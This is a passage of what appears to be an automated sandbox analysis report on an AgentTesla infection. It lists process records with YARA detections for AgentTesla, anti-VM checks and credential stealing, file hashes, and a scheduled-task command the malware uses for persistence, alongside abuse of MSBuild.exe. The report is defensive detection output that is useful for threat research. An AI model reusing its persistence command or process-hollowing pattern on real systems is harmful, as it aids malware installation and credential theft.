                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.294334493.000000000A8E8000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.294334493.000000000A8E8000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.293912263.000000000A721000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.293912263.000000000A721000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.290373669.000000000370C000.00000004.00000001.sdmp, Author: Joe Security
                                          Reputation:low

                                          General

                                          Start time:14:12:51
                                          Start date:15/09/2021
                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ncXzBAPDBtn' /XML 'C:\Users\user\AppData\Local\Temp\tmp9BE9.tmp'
                                          Imagebase:0x9e0000
                                          File size:185856 bytes
                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:14:12:51
                                          Start date:15/09/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff797770000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:14:12:51
                                          Start date:15/09/2021
                                          Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                                          Imagebase:0xb50000
                                          File size:69632 bytes
                                          MD5 hash:88BBB7610152B48C2B3879473B17857E
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.525207312.00000000034F9000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.525207312.00000000034F9000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.524239294.0000000003281000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.524239294.0000000003281000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.520256174.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.520256174.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          Disassembly

                                          Code Analysis

                                          Reset < >